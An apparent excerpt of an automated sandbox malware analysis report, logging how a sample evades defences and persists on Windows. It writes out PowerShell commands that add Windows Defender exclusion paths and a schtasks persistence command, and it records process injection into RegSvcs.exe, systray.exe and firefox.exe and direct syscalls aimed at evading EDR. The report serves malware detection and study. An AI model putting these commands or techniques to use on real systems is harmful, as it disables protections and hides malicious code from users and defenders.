                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01598BF0 mov eax, dword ptr fs:[00000030h]15_2_01598BF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01598BF0 mov eax, dword ptr fs:[00000030h]15_2_01598BF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01598BF0 mov eax, dword ptr fs:[00000030h]15_2_01598BF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0163EBD0 mov eax, dword ptr fs:[00000030h]15_2_0163EBD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01644BB0 mov eax, dword ptr fs:[00000030h]15_2_01644BB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01644BB0 mov eax, dword ptr fs:[00000030h]15_2_01644BB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015A0BBE mov eax, dword ptr fs:[00000030h]15_2_015A0BBE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015A0BBE mov eax, dword ptr fs:[00000030h]15_2_015A0BBE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015A0A5B mov eax, dword ptr fs:[00000030h]15_2_015A0A5B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015A0A5B mov eax, dword ptr fs:[00000030h]15_2_015A0A5B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0163EA60 mov eax, dword ptr fs:[00000030h]15_2_0163EA60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01596A50 mov eax, dword ptr fs:[00000030h]15_2_01596A50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01596A50 mov eax, dword ptr fs:[00000030h]15_2_01596A50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01596A50 mov eax, dword ptr fs:[00000030h]15_2_01596A50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01596A50 mov eax, dword ptr fs:[00000030h]15_2_01596A50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01596A50 mov eax, dword ptr fs:[00000030h]15_2_01596A50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01596A50 mov eax, dword ptr fs:[00000030h]15_2_01596A50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01596A50 mov eax, dword ptr fs:[00000030h]15_2_01596A50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0160CA72 mov eax, dword ptr fs:[00000030h]15_2_0160CA72
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0160CA72 mov eax, dword ptr fs:[00000030h]15_2_0160CA72
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015CCA6F mov eax, dword ptr fs:[00000030h]15_2_015CCA6F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015CCA6F mov eax, dword ptr fs:[00000030h]15_2_015CCA6F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015CCA6F mov eax, dword ptr fs:[00000030h]15_2_015CCA6F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015CCA38 mov eax, dword ptr fs:[00000030h]15_2_015CCA38
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015B4A35 mov eax, dword ptr fs:[00000030h]15_2_015B4A35
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015B4A35 mov eax, dword ptr fs:[00000030h]15_2_015B4A35
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0161CA11 mov eax, dword ptr fs:[00000030h]15_2_0161CA11
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015BEA2E mov eax, dword ptr fs:[00000030h]15_2_015BEA2E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015CCA24 mov eax, dword ptr fs:[00000030h]15_2_015CCA24
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01590AD0 mov eax, dword ptr fs:[00000030h]15_2_01590AD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015C4AD0 mov eax, dword ptr fs:[00000030h]15_2_015C4AD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015C4AD0 mov eax, dword ptr fs:[00000030h]15_2_015C4AD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015E6ACC mov eax, dword ptr fs:[00000030h]15_2_015E6ACC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015E6ACC mov eax, dword ptr fs:[00000030h]15_2_015E6ACC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015E6ACC mov eax, dword ptr fs:[00000030h]15_2_015E6ACC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015CAAEE mov eax, dword ptr fs:[00000030h]15_2_015CAAEE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015CAAEE mov eax, dword ptr fs:[00000030h]15_2_015CAAEE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015C8A90 mov edx, dword ptr fs:[00000030h]15_2_015C8A90
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0159EA80 mov eax, dword ptr fs:[00000030h]15_2_0159EA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0159EA80 mov eax, dword ptr fs:[00000030h]15_2_0159EA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0159EA80 mov eax, dword ptr fs:[00000030h]15_2_0159EA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0159EA80 mov eax, dword ptr fs:[00000030h]15_2_0159EA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0159EA80 mov eax, dword ptr fs:[00000030h]15_2_0159EA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0159EA80 mov eax, dword ptr fs:[00000030h]15_2_0159EA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0159EA80 mov eax, dword ptr fs:[00000030h]15_2_0159EA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0159EA80 mov eax, dword ptr fs:[00000030h]15_2_0159EA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0159EA80 mov eax, dword ptr fs:[00000030h]15_2_0159EA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01664A80 mov eax, dword ptr fs:[00000030h]15_2_01664A80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01598AA0 mov eax, dword ptr fs:[00000030h]15_2_01598AA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01598AA0 mov eax, dword ptr fs:[00000030h]15_2_01598AA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015E6AA4 mov eax, dword ptr fs:[00000030h]15_2_015E6AA4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01590D59 mov eax, dword ptr fs:[00000030h]15_2_01590D59
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01590D59 mov eax, dword ptr fs:[00000030h]15_2_01590D59
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01590D59 mov eax, dword ptr fs:[00000030h]15_2_01590D59
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01598D59 mov eax, dword ptr fs:[00000030h]15_2_01598D59
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01598D59 mov eax, dword ptr fs:[00000030h]15_2_01598D59
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01598D59 mov eax, dword ptr fs:[00000030h]15_2_01598D59
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01598D59 mov eax, dword ptr fs:[00000030h]15_2_01598D59
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01598D59 mov eax, dword ptr fs:[00000030h]15_2_01598D59
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01628D6B mov eax, dword ptr fs:[00000030h]15_2_01628D6B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015C4D1D mov eax, dword ptr fs:[00000030h]15_2_015C4D1D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01618D20 mov eax, dword ptr fs:[00000030h]15_2_01618D20
                Source: C:\Users\user\Desktop\n2pGr8w21V.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\n2pGr8w21V.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Adds a directory exclusion to Windows Defender
                Source: C:\Users\user\Desktop\n2pGr8w21V.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\n2pGr8w21V.exe"
                Source: C:\Users\user\Desktop\n2pGr8w21V.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\uEugNEto.exe"
                Source: C:\Users\user\Desktop\n2pGr8w21V.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\n2pGr8w21V.exe"Jump to behavior
                Source: C:\Users\user\Desktop\n2pGr8w21V.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\uEugNEto.exe"Jump to behavior
                Allocates memory in foreign processes
                Source: C:\Users\user\Desktop\n2pGr8w21V.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and writeJump to behavior
                Source: C:\Users\user\AppData\Roaming\uEugNEto.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and writeJump to behavior
                Found direct / indirect Syscall (likely to bypass EDR)
                Source: C:\Program Files (x86)\GFsImQVHNEQZxUwbhDneezFpyfJJaThlrIXiWSAPfvZayXrwZhkYUBnOQkx\ISaSZznjXcpoJ.exeNtWriteVirtualMemory: Direct from: 0x77762E3CJump to behavior
                Source: C:\Program Files (x86)\GFsImQVHNEQZxUwbhDneezFpyfJJaThlrIXiWSAPfvZayXrwZhkYUBnOQkx\ISaSZznjXcpoJ.exeNtMapViewOfSection: Direct from: 0x77762D1C
                Source: C:\Program Files (x86)\GFsImQVHNEQZxUwbhDneezFpyfJJaThlrIXiWSAPfvZayXrwZhkYUBnOQkx\ISaSZznjXcpoJ.exeNtNotifyChangeKey: Direct from: 0x77763C2C
                Source: C:\Program Files (x86)\GFsImQVHNEQZxUwbhDneezFpyfJJaThlrIXiWSAPfvZayXrwZhkYUBnOQkx\ISaSZznjXcpoJ.exeNtCreateMutant: Direct from: 0x777635CC
                Source: C:\Program Files (x86)\GFsImQVHNEQZxUwbhDneezFpyfJJaThlrIXiWSAPfvZayXrwZhkYUBnOQkx\ISaSZznjXcpoJ.exeNtResumeThread: Direct from: 0x777636AC
                Source: C:\Program Files (x86)\GFsImQVHNEQZxUwbhDneezFpyfJJaThlrIXiWSAPfvZayXrwZhkYUBnOQkx\ISaSZznjXcpoJ.exeNtProtectVirtualMemory: Direct from: 0x77757B2E
                Source: C:\Program Files (x86)\GFsImQVHNEQZxUwbhDneezFpyfJJaThlrIXiWSAPfvZayXrwZhkYUBnOQkx\ISaSZznjXcpoJ.exeNtQuerySystemInformation: Direct from: 0x77762DFC
                Source: C:\Program Files (x86)\GFsImQVHNEQZxUwbhDneezFpyfJJaThlrIXiWSAPfvZayXrwZhkYUBnOQkx\ISaSZznjXcpoJ.exeNtAllocateVirtualMemory: Direct from: 0x77762BFC
                Source: C:\Program Files (x86)\GFsImQVHNEQZxUwbhDneezFpyfJJaThlrIXiWSAPfvZayXrwZhkYUBnOQkx\ISaSZznjXcpoJ.exeNtReadFile: Direct from: 0x77762ADCJump to behavior
                Source: C:\Program Files (x86)\GFsImQVHNEQZxUwbhDneezFpyfJJaThlrIXiWSAPfvZayXrwZhkYUBnOQkx\ISaSZznjXcpoJ.exeNtDelayExecution: Direct from: 0x77762DDC
                Source: C:\Program Files (x86)\GFsImQVHNEQZxUwbhDneezFpyfJJaThlrIXiWSAPfvZayXrwZhkYUBnOQkx\ISaSZznjXcpoJ.exeNtWriteVirtualMemory: Direct from: 0x7776490CJump to behavior
                Source: C:\Program Files (x86)\GFsImQVHNEQZxUwbhDneezFpyfJJaThlrIXiWSAPfvZayXrwZhkYUBnOQkx\ISaSZznjXcpoJ.exeNtQueryInformationProcess: Direct from: 0x77762C26
                Source: C:\Program Files (x86)\GFsImQVHNEQZxUwbhDneezFpyfJJaThlrIXiWSAPfvZayXrwZhkYUBnOQkx\ISaSZznjXcpoJ.exeNtResumeThread: Direct from: 0x77762FBCJump to behavior
                Source: C:\Program Files (x86)\GFsImQVHNEQZxUwbhDneezFpyfJJaThlrIXiWSAPfvZayXrwZhkYUBnOQkx\ISaSZznjXcpoJ.exeNtCreateUserProcess: Direct from: 0x7776371CJump to behavior
                Source: C:\Program Files (x86)\GFsImQVHNEQZxUwbhDneezFpyfJJaThlrIXiWSAPfvZayXrwZhkYUBnOQkx\ISaSZznjXcpoJ.exeNtAllocateVirtualMemory: Direct from: 0x77763C9C
                Source: C:\Program Files (x86)\GFsImQVHNEQZxUwbhDneezFpyfJJaThlrIXiWSAPfvZayXrwZhkYUBnOQkx\ISaSZznjXcpoJ.exeNtSetInformationThread: Direct from: 0x77762B4C
                Source: C:\Program Files (x86)\GFsImQVHNEQZxUwbhDneezFpyfJJaThlrIXiWSAPfvZayXrwZhkYUBnOQkx\ISaSZznjXcpoJ.exeNtQueryAttributesFile: Direct from: 0x77762E6C
                Source: C:\Program Files (x86)\GFsImQVHNEQZxUwbhDneezFpyfJJaThlrIXiWSAPfvZayXrwZhkYUBnOQkx\ISaSZznjXcpoJ.exeNtClose: Direct from: 0x77762B6C
                Source: C:\Program Files (x86)\GFsImQVHNEQZxUwbhDneezFpyfJJaThlrIXiWSAPfvZayXrwZhkYUBnOQkx\ISaSZznjXcpoJ.exeNtReadVirtualMemory: Direct from: 0x77762E8CJump to behavior
                Source: C:\Program Files (x86)\GFsImQVHNEQZxUwbhDneezFpyfJJaThlrIXiWSAPfvZayXrwZhkYUBnOQkx\ISaSZznjXcpoJ.exeNtCreateKey: Direct from: 0x77762C6C
                Source: C:\Program Files (x86)\GFsImQVHNEQZxUwbhDneezFpyfJJaThlrIXiWSAPfvZayXrwZhkYUBnOQkx\ISaSZznjXcpoJ.exeNtQuerySystemInformation: Direct from: 0x777648CC
                Source: C:\Program Files (x86)\GFsImQVHNEQZxUwbhDneezFpyfJJaThlrIXiWSAPfvZayXrwZhkYUBnOQkx\ISaSZznjXcpoJ.exeNtAllocateVirtualMemory: Direct from: 0x777648ECJump to behavior
                Source: C:\Program Files (x86)\GFsImQVHNEQZxUwbhDneezFpyfJJaThlrIXiWSAPfvZayXrwZhkYUBnOQkx\ISaSZznjXcpoJ.exeNtQueryVolumeInformationFile: Direct from: 0x77762F2CJump to behavior
                Source: C:\Program Files (x86)\GFsImQVHNEQZxUwbhDneezFpyfJJaThlrIXiWSAPfvZayXrwZhkYUBnOQkx\ISaSZznjXcpoJ.exeNtOpenSection: Direct from: 0x77762E0C
                Source: C:\Program Files (x86)\GFsImQVHNEQZxUwbhDneezFpyfJJaThlrIXiWSAPfvZayXrwZhkYUBnOQkx\ISaSZznjXcpoJ.exeNtDeviceIoControlFile: Direct from: 0x77762AEC
                Source: C:\Program Files (x86)\GFsImQVHNEQZxUwbhDneezFpyfJJaThlrIXiWSAPfvZayXrwZhkYUBnOQkx\ISaSZznjXcpoJ.exeNtAllocateVirtualMemory: Direct from: 0x77762BEC
                Source: C:\Program Files (x86)\GFsImQVHNEQZxUwbhDneezFpyfJJaThlrIXiWSAPfvZayXrwZhkYUBnOQkx\ISaSZznjXcpoJ.exeNtSetInformationThread: Direct from: 0x77762ECC
                Source: C:\Program Files (x86)\GFsImQVHNEQZxUwbhDneezFpyfJJaThlrIXiWSAPfvZayXrwZhkYUBnOQkx\ISaSZznjXcpoJ.exeNtQueryInformationToken: Direct from: 0x77762CAC
                Source: C:\Program Files (x86)\GFsImQVHNEQZxUwbhDneezFpyfJJaThlrIXiWSAPfvZayXrwZhkYUBnOQkx\ISaSZznjXcpoJ.exeNtCreateFile: Direct from: 0x77762FEC
                Source: C:\Program Files (x86)\GFsImQVHNEQZxUwbhDneezFpyfJJaThlrIXiWSAPfvZayXrwZhkYUBnOQkx\ISaSZznjXcpoJ.exeNtOpenFile: Direct from: 0x77762DCC
                Source: C:\Program Files (x86)\GFsImQVHNEQZxUwbhDneezFpyfJJaThlrIXiWSAPfvZayXrwZhkYUBnOQkx\ISaSZznjXcpoJ.exeNtOpenKeyEx: Direct from: 0x77762B9C
                Source: C:\Program Files (x86)\GFsImQVHNEQZxUwbhDneezFpyfJJaThlrIXiWSAPfvZayXrwZhkYUBnOQkx\ISaSZznjXcpoJ.exeNtSetInformationProcess: Direct from: 0x77762C5C
                Source: C:\Program Files (x86)\GFsImQVHNEQZxUwbhDneezFpyfJJaThlrIXiWSAPfvZayXrwZhkYUBnOQkx\ISaSZznjXcpoJ.exeNtProtectVirtualMemory: Direct from: 0x77762F9C
                Injects a PE file into a foreign processes
                Source: C:\Users\user\Desktop\n2pGr8w21V.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\AppData\Roaming\uEugNEto.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5AJump to behavior
                Maps a DLL or memory area into another process
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSection loaded: NULL target: C:\Program Files (x86)\GFsImQVHNEQZxUwbhDneezFpyfJJaThlrIXiWSAPfvZayXrwZhkYUBnOQkx\ISaSZznjXcpoJ.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSection loaded: NULL target: C:\Windows\SysWOW64\systray.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\systray.exeSection loaded: NULL target: C:\Program Files (x86)\GFsImQVHNEQZxUwbhDneezFpyfJJaThlrIXiWSAPfvZayXrwZhkYUBnOQkx\ISaSZznjXcpoJ.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\systray.exeSection loaded: NULL target: C:\Program Files (x86)\GFsImQVHNEQZxUwbhDneezFpyfJJaThlrIXiWSAPfvZayXrwZhkYUBnOQkx\ISaSZznjXcpoJ.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\systray.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\systray.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                Modifies the context of a thread in another process (thread injection)
                Source: C:\Windows\SysWOW64\systray.exeThread register set: target process: 1004
                Queues an APC in another process (thread injection)
                Source: C:\Windows\SysWOW64\systray.exeThread APC queued: target process: C:\Program Files (x86)\GFsImQVHNEQZxUwbhDneezFpyfJJaThlrIXiWSAPfvZayXrwZhkYUBnOQkx\ISaSZznjXcpoJ.exe
                Writes to foreign memory regions
                Source: C:\Users\user\Desktop\n2pGr8w21V.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000Jump to behavior
                Source: C:\Users\user\Desktop\n2pGr8w21V.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 401000Jump to behavior
                Source: C:\Users\user\Desktop\n2pGr8w21V.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: CCB008Jump to behavior
                Source: C:\Users\user\AppData\Roaming\uEugNEto.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000Jump to behavior
                Source: C:\Users\user\AppData\Roaming\uEugNEto.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 401000Jump to behavior
                Source: C:\Users\user\AppData\Roaming\uEugNEto.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: A92008Jump to behavior
                Source: C:\Users\user\Desktop\n2pGr8w21V.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\n2pGr8w21V.exe"Jump to behavior
                Source: C:\Users\user\Desktop\n2pGr8w21V.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\uEugNEto.exe"Jump to behavior
                Source: C:\Users\user\Desktop\n2pGr8w21V.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uEugNEto" /XML "C:\Users\user\AppData\Local\Temp\tmpB98D.tmp"Jump to behavior
                Source: C:\Users\user\Desktop\n2pGr8w21V.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\uEugNEto.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uEugNEto" /XML "C:\Users\user\AppData\Local\Temp\tmpEA52.tmp"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\uEugNEto.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                Source: C:\Program Files (x86)\GFsImQVHNEQZxUwbhDneezFpyfJJaThlrIXiWSAPfvZayXrwZhkYUBnOQkx\ISaSZznjXcpoJ.exeProcess created: C:\Windows\SysWOW64\systray.exe "C:\Windows\SysWOW64\systray.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\systray.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: ISaSZznjXcpoJ.exe, 00000016.00000002.2510545126.0000000001760000.00000002.00000001.00040000.00000000.sdmp, ISaSZznjXcpoJ.exe, 00000016.00000000.1500511336.0000000001760000.00000002.00000001.00040000.00000000.sdmp, ISaSZznjXcpoJ.exe, 00000018.00000002.2511565241.0000000000FC0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: ISaSZznjXcpoJ.exe, 00000016.00000002.2510545126.0000000001760000.00000002.00000001.00040000.00000000.sdmp, ISaSZznjXcpoJ.exe, 00000016.00000000.1500511336.0000000001760000.00000002.00000001.00040000.00000000.sdmp, ISaSZznjXcpoJ.exe, 00000018.00000002.2511565241.0000000000FC0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: ISaSZznjXcpoJ.exe, 00000016.00000002.2510545126.0000000001760000.00000002.00000001.00040000.00000000.sdmp, ISaSZznjXcpoJ.exe, 00000016.00000000.1500511336.0000000001760000.00000002.00000001.00040000.00000000.sdmp, ISaSZznjXcpoJ.exe, 00000018.00000002.2511565241.0000000000FC0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: ?Program Manager
                Source: ISaSZznjXcpoJ.exe, 00000016.00000002.2510545126.0000000001760000.00000002.00000001.00040000.00000000.sdmp, ISaSZznjXcpoJ.exe, 00000016.00000000.1500511336.0000000001760000.00000002.00000001.00040000.00000000.sdmp, ISaSZznjXcpoJ.exe, 00000018.00000002.2511565241.0000000000FC0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\n2pGr8w21V.exeQueries volume information: C:\Users\user\Desktop\n2pGr8w21V.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\n2pGr8w21V.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\n2pGr8w21V.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\n2pGr8w21V.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\n2pGr8w21V.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\n2pGr8w21V.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
